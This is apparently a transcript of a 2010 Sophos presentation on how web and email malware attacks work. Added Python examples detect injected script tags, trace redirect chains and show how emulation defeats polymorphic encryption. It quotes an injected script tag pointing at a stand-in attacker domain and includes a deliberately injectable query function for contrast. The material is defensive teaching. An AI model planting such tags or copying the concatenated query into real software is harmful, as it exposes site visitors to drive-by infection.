Anatomy of attack – the way of malware - PowerPoint PPT Presentation

Presentation Transcript

  1. Anatomy of attack – the way of malware. Vanja Svajcer, Principal Researcher, Sophos. Zagreb, 12 May 2010

  2. What do SophosLabs do? • Collect threats • Analyze and classify • Create detection and cleanup • Publish updates and information • R & D • More details later

  3. SophosLabs at the core

  4. Anatomy of attack • Setting the scene • Malware • Attack techniques • Analysis process & tools • Protection technology

  5. Malware types • Virus • Trojan • Worm

  6. Who used to write viruses? No “standard” virus writer, no “standard” motivation. Schoolkids, undergraduates, post-graduates, IT professionals. Generally blokes, but not A/V companies.

  7. Who writes malware today? Rarely see viruses, but they are making a comeback. It is about money. It is criminal in its origins. (There are still some spotty teenagers out there …)

  8. APT • Advanced Persistent Threat • Fashionable term for “targeted malware” • Small size (around 100k) and specialised • No packing • Looks like legitimate Windows file • Data exfiltration • Difficult to remove

  9. Email threats • The latter half of 2008 saw a dramatic rise in email attachment malware • 2009 has seen this trend continue, several families being aggressively mass-spammed • Same old social engineering tactics • UPS/FedEx failed delivery reports, Microsoft patches, airline e-tickets, etc.

  10. Top spammed malware (2009) • Dominated by key malware families • Bredo • Waled • Simple but still working!

  11. Social Engineering – Bredo Mal/Bredo • Same campaign may involve numerous “different” attachments

  12. Social Engineering – Zbot (aka Zeus) Mal/Zbot

  13. Bredo vs Zbot • Competition between the bots!!! • Bredo attempting to disable any installed Zbot • Reminiscent of the Netsky vs Bagle wars from years ago!!!

  14. Email threats • Global spam traps to track spam • USA relays more spam than any other single country • Compromised computers not only spread spam, but distribute malware and launch DDoS attacks

  15. Web predominant • 99% of infected systems are legitimate, compromised sites • Attack sites • Botnet C&C using HTTP • Attacks still often begin with a spammed-out email

  16. Web 2.0 Application Attacks

  17. Step 1: Redirect from compromised sites. Compromised web sites → Attacker-controlled redirects → Attack site using bundle of exploits → Payload

  18. Compromising hosts

  19. SQL injection (diagram: DB, DB, DB; malicious SQL injection) • Hacker uses tool to identify pages potentially vulnerable to SQL injection • Sends malicious HTTP request (Demo)

  20. SQL injection (diagram: `<script src=http://[evil].com/file.js` repeated many times across the page) • SQL injection causes databases to become peppered with malicious script tags • Result is that pages on the web server built from data retrieved from the database also contain malicious script tags

  21. SQL injection • User browses site • Malicious script tag silently loads script from remote server • Victim is infected with malware: Asprox trojan

  22. Demo SQLi + XSS
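The mass-SQLi pattern on slides 19–21 (script tags written into the database, then rendered into every page built from it) comes down to two defender controls: keep user input from ever becoming part of the SQL statement, and encode stored data on output so a tag that did reach the database cannot execute. The following is an added example, not code from the presentation or from Sophos; it uses an in-memory SQLite database with constructed rows (the third row imitates a record an injection campaign has already peppered, using the slide's `[evil].com` placeholder), shows the concatenated query beside the parameterised one, and includes a scan of stored content for script tags as a detection check.

```python
import html
import re
import sqlite3

# Constructed rows standing in for a site's content store. Row 3 imitates a
# record that a mass-SQLi campaign has already "peppered" with a script tag.
SAMPLE_ROWS = [
    (1, "Welcome", "Hello and welcome to our site."),
    (2, "O'Brien's page", "Contact the author for details."),
    (3, "News", 'Latest news.<script src="http://[evil].com/file.js"></script>'),
]

# Fingerprint of the stored-tag pattern described on slide 20.
SCRIPT_TAG = re.compile(r"<script\b[^>]*>", re.IGNORECASE)


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def find_page_vulnerable(conn, title):
    # Deliberately weak form: the statement is assembled from user input, so a
    # quote in the input changes the SQL itself (data/code confusion).
    sql = "SELECT id FROM pages WHERE title = '" + title + "'"
    return [row[0] for row in conn.execute(sql)]


def find_page_safe(conn, title):
    # Parameterised form: the input is bound as data and can never become SQL.
    rows = conn.execute("SELECT id FROM pages WHERE title = ?", (title,))
    return [row[0] for row in rows]


def vulnerable_query_breaks(conn, title):
    # Returns True when the concatenated statement no longer parses, i.e. the
    # input altered the query. A perfectly ordinary surname is enough.
    try:
        find_page_vulnerable(conn, title)
    except sqlite3.Error:
        return True
    return False


def scan_for_injected_scripts(conn):
    # Defender check: list (page id, column) pairs holding a script tag.
    hits = []
    for page_id, title, body in conn.execute("SELECT id, title, body FROM pages"):
        for column, value in (("title", title), ("body", body)):
            if SCRIPT_TAG.search(value or ""):
                hits.append((page_id, column))
    return hits


def render_body(conn, page_id):
    # Output encoding: a tag that reached the database is shown as text,
    # not handed to the browser as script.
    (body,) = conn.execute("SELECT body FROM pages WHERE id = ?", (page_id,)).fetchone()
    return html.escape(body)


if __name__ == "__main__":
    db = make_db()
    print("safe lookup:", find_page_safe(db, "O'Brien's page"))
    print("concatenated query breaks on a quote:", vulnerable_query_breaks(db, "O'Brien's page"))
    print("stored script tags at:", scan_for_injected_scripts(db))
    print("rendered row 3:", render_body(db, 3))
```

The scan is the piece worth scheduling: a periodic query of text columns for `<script` (or for the specific domains an incident exposed) catches the database-side symptom long before a user browses an affected page.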

  23. Newly infected web pages – April 2010

  24. Step 2: Further redirects. Compromised web sites → Attacker-controlled redirects → Payload

  25. SEO poisoning • Search for popular keywords

  26. Blackhat SEO

  27. Blackhat SEO

  28. Demo Blackhat SEO

  29. Visibility – sites hosting SEO kits

  30. Step 3: Load content from the attack site. Compromised web sites → Attacker-controlled redirects → Attack site using bundle of exploits → Payload
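Steps 1 to 3 above describe the same chain every time: a compromised (or SEO-poisoned) page answers with a redirect, an attacker-controlled redirector forwards again, and the attack site finally serves the exploit bundle. Seen from a web proxy log, that is a run of 30x responses hopping across several unrelated hosts within a few seconds for one client. The following is an added example, not code from the presentation or from Sophos; the log format, hostnames and the `SEARCH_HOSTS` list are all constructed for it, and the chain reconstruction works on any log that records the request URL, status and Location/Referer values.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed proxy log (not real traffic). One request per line:
#   <iso-timestamp> <client-ip> <status> <url> <location-or-dash> <referer-or-dash>
SAMPLE_LOG = """\
2010-04-12T10:00:01 10.0.0.5 302 http://news.example.org/article http://redir.example.net/go?id=7 http://search.example.com/?q=popular+topic
2010-04-12T10:00:02 10.0.0.5 302 http://redir.example.net/go?id=7 http://kit.example.biz/index.php http://news.example.org/article
2010-04-12T10:00:03 10.0.0.5 200 http://kit.example.biz/index.php - http://redir.example.net/go?id=7
2010-04-12T10:05:00 10.0.0.9 301 http://shop.example.org/ http://www.shop.example.org/ -
2010-04-12T10:05:01 10.0.0.9 200 http://www.shop.example.org/ - -
"""

SEARCH_HOSTS = {"search.example.com"}  # constructed stand-in for search engines
MAX_HOP_GAP = timedelta(seconds=10)    # hops of one chain land within seconds
MIN_DISTINCT_HOSTS = 3                 # compromised site -> redirector -> attack site


def parse_log(text):
    events = []
    for line in text.splitlines():
        ts, client, status, url, location, referer = line.split()
        events.append({
            "time": datetime.fromisoformat(ts),
            "client": client,
            "status": int(status),
            "url": url,
            "location": None if location == "-" else location,
            "referer": None if referer == "-" else referer,
        })
    return events


def host_of(url):
    return urlparse(url).hostname


def find_redirect_chains(events):
    """Follow Location headers per client; each chain is a list of events."""
    by_client = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_client[ev["client"]].append(ev)

    chains = []
    for evs in by_client.values():
        consumed = set()
        for i, start in enumerate(evs):
            if i in consumed or not (300 <= start["status"] < 400):
                continue
            chain, cur, idx = [start], start, i
            # Walk forward while this client's next request matches the Location
            # we were just sent to and arrives within the hop window.
            while cur["location"] is not None:
                nxt = None
                for j in range(idx + 1, len(evs)):
                    if j in consumed:
                        continue
                    if (evs[j]["url"] == cur["location"]
                            and evs[j]["time"] - cur["time"] <= MAX_HOP_GAP):
                        nxt = j
                        break
                if nxt is None:
                    break
                consumed.add(nxt)
                cur, idx = evs[nxt], nxt
                chain.append(cur)
            chains.append(chain)
    return chains


def suspicious_chains(events):
    """Chains crossing several unrelated hosts match the drive-by pattern;
    an entry referer from a search engine points at SEO poisoning."""
    flagged = []
    for chain in find_redirect_chains(events):
        hosts = list(dict.fromkeys(host_of(e["url"]) for e in chain))
        if len(hosts) < MIN_DISTINCT_HOSTS:
            continue  # e.g. a plain shop.example.org -> www.shop.example.org hop
        entry_ref = chain[0]["referer"]
        flagged.append({
            "client": chain[0]["client"],
            "hosts": hosts,
            "via_search": entry_ref is not None and host_of(entry_ref) in SEARCH_HOSTS,
        })
    return flagged


if __name__ == "__main__":
    for hit in suspicious_chains(parse_log(SAMPLE_LOG)):
        print(hit)
```

The distinct-host threshold is what separates a drive-by chain from the ordinary one-hop canonicalisation redirects every site emits; tune `MAX_HOP_GAP` and the threshold to the proxy's own traffic before alerting on it.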

  31. Web Attacks • Built using purchased kits: MPack, IcePack, GPack, Neosploit, Eleonore, Yes • Management console • Phishing • Discovered: Oct 19th 2009 • Country hit rate: • France – 4% • US – 17% • GB – 3% • Germany – 6%

  32. Web Attacks • Per-browser breakdown! • Server-side polymorphism • Hit rate: • MSIE – 12% • FireFox – 1% • Opera – 5%

  33. Polymorphism

  34. Polymorphism

  35. Polymorphism

  36. Polymorphism

  37. Polymorphism

  38. Polymorphic malware weakness • Poly engine part of the code • Can be reversed by persistent researchers • Must be decrypted in memory • Emulate the code until the invariant is found • Detection can be based on the decryption loop
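Slide 38's point is that a polymorphic engine can change the encrypted body and pad the code with junk, but the decryption loop must still run in memory and the decrypted body must still be the same invariant, so a scanner that either matches the loop or emulates it wins. The following is an added example, not code from the presentation or from Sophos: a toy sample layout (junk NOP padding, a fixed byte string standing in for the loop's code, a key byte, and the body XORed with a rolling key) constructed purely to show why a raw byte signature fails across variants while loop detection and emulation do not. Server-side polymorphism, where a fresh variant is generated per download, changes nothing here: `make_variant` called with a new key per request is the same situation.

```python
import hashlib

# Toy "polymorphic" layout, constructed for this example (not a real malware
# format): [0..n junk NOP bytes][decrypt loop][key][body XOR (key + i)]
NOP = b"\x90"
DECRYPT_LOOP = b"\xde\xc0\xde\x10"   # stands in for the loop's machine code
INVARIANT_PAYLOAD = b"constructed invariant body: the part that never changes"
INVARIANT_HASH = hashlib.sha256(INVARIANT_PAYLOAD).hexdigest()


def xor_rolling(data, key):
    # Byte i is XORed with (key + i) mod 256; applying it twice restores the input.
    return bytes(b ^ ((key + i) & 0xFF) for i, b in enumerate(data))


def make_variant(key, nops):
    """Build one variant: same payload, different key and junk padding."""
    assert 0 <= key <= 0xFF
    return NOP * nops + DECRYPT_LOOP + bytes([key]) + xor_rolling(INVARIANT_PAYLOAD, key)


def raw_signature_match(sample, signature):
    # Naive scanner: a byte string lifted from one variant's encrypted body.
    return signature in sample


def normalise(sample):
    # Strip the junk padding the engine inserts in front of the loop.
    return sample.lstrip(NOP)


def loop_signature_match(sample):
    # Detection on the decryption loop, which the engine cannot vary.
    return normalise(sample).startswith(DECRYPT_LOOP)


def emulate_decrypt(sample):
    """Do what the sample's own loop would do in memory; return the plaintext."""
    body = normalise(sample)
    if not body.startswith(DECRYPT_LOOP):
        return None
    rest = body[len(DECRYPT_LOOP):]
    if not rest:
        return None
    key, ciphertext = rest[0], rest[1:]
    return xor_rolling(ciphertext, key)


def emulate_and_match(sample):
    # Run the decryptor, then compare the recovered invariant by hash.
    plain = emulate_decrypt(sample)
    return plain is not None and hashlib.sha256(plain).hexdigest() == INVARIANT_HASH


if __name__ == "__main__":
    v1, v2 = make_variant(0x41, 2), make_variant(0x7B, 0)
    sig = v1[-16:]  # signature lifted from variant 1's encrypted body
    print("raw signature hits v1:", raw_signature_match(v1, sig))
    print("raw signature hits v2:", raw_signature_match(v2, sig))
    print("loop signature hits both:", loop_signature_match(v1) and loop_signature_match(v2))
    print("emulation recovers invariant:", emulate_and_match(v1) and emulate_and_match(v2))
```

A real emulator runs the loop rather than reimplementing it, but the decision is the same: stop when the memory image stops changing (the invariant is exposed) and match on that, or match on the loop itself.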

  39. Server side polymorphism

  40. Server side polymorphism

  41. Server side polymorphism

  42. Server side polymorphism

  43. Demo SSP

  44. Step 4: Hit the victim with exploits, infect them. Compromised web sites → Attacker-controlled redirects → Attack site using bundle of exploits → Payload

  45. Video - scareware

  46. Troj/MacSwp

  47. Zeus (Zbot) • Information stealing malware and botnet building kit • Builder • Loader • Control panel